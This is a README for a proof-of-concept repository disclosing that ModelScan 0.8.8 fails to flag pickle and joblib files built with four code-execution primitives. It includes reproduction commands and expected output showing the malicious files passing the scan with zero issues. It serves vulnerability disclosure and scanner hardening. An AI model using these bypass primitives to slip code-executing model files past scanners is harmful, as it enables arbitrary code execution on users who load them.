ModelScan v0.8.8 additional unsafe_globals primitives
Proof-of-concept files demonstrating that ModelScan's unsafe_globals allowlist omits four additional code-execution primitives beyond those already disclosed in issues #338, #331, and PR #339 on protectai/modelscan:
operator.methodcallerfunctools.partialatexit.registerthreading.Thread
The bypass affects every extension PickleUnsafeOpScan is dispatched to via FormatViaExtensionMiddleware: .pkl, .pickle, .joblib, .dill, .dat, .data. A .joblib variant (R2_A1-09_threading.joblib) is included as concrete demonstration that the .joblib extension routes to the same scanner and yields the same total_issues: 0 result.
These files are intentionally malicious for demonstration purposes. Do not load any of them on a system you care about.
See the huntr submission for the detailed Description.
Reproduction
python -m venv venv
# Windows: . venv/Scripts/activate
# POSIX: . venv/bin/activate
pip install modelscan==0.8.8
git clone https://huggingface.co/askeladd-k/modelscan-additional-primitives poc
cd poc
python repro.py
Expected output
R2_A1-02_methodcaller.pkl: total_issues=0 [BYPASSED (gap)]
R2_A1-05_partial.pkl: total_issues=0 [BYPASSED (gap)]
R2_A1-07_atexit.pkl: total_issues=0 [BYPASSED (gap)]
R2_A1-09_threading.pkl: total_issues=0 [BYPASSED (gap)]
R2_A1-09_threading.joblib: total_issues=0 [BYPASSED (gap, .joblib variant)]
positive_control.pkl: total_issues=1 [FLAGGED (positive control)]
AI disclosure
These proof-of-concept files were generated with AI-assisted analysis and manually verified in a clean environment against vanilla pip install modelscan==0.8.8.